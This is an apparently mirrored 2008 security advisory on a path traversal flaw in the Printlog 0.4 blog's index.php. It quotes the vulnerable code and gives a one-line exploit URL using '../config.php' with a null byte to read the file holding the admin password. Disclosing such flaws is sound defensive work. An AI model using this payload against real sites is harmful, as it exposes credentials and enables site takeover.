Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20641
HistoryOct 02, 2008 - 12:00 a.m.

Printlog <= 0.4: Remote File Edition Vulnerability

2008-10-0200:00:00
vulners.com
25

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Printlog <= 0.4: Remote File Edition Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

$ Program: Printlog
$ File affected: index.php
$ Version: 0.4
$ Download: http://www.hardkap.net/pritlog

Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org

– Description (by the author's page) –
PRITLOG is an extremely simple, small and powerful blog system. It does not
use or need a MYSQL database and fully works based on flat files. The idea
is derived from a similar app called PPLOG.

– Bug –
You can navigate and see the entries. Something like as:
http://localhost/p/index.php?option=viewEntry&amp;filename=00001

Code doesn't check the comments directory:

  1. function viewEntry() {
  2. $fileName =
    isset($_POST['filename'])?$_POST['filename']:$_GET['filename'];
  3. global $postdir, $separator, $newPostFile, $newFullPostNumber,
    $debugMode, $config_textAreaCols, $config_textAreaRows;
  4. global $config_allowComments, $config_commentsSecurityCode,
    $config_CAPTCHALength, $config_randomString;
  5. global $commentdir,$config_dbFilesExtension, $config_onlyNumbersOnCAPTCHA;
  6. $viewFileName=$postdir.$fileName.$config_dbFilesExtension;

– Exploit –
If magic quotes are off you can do:
http://localhost/p/index.php?option=viewEntry&amp;filename=../config.php&#37;00

config.php has the admin password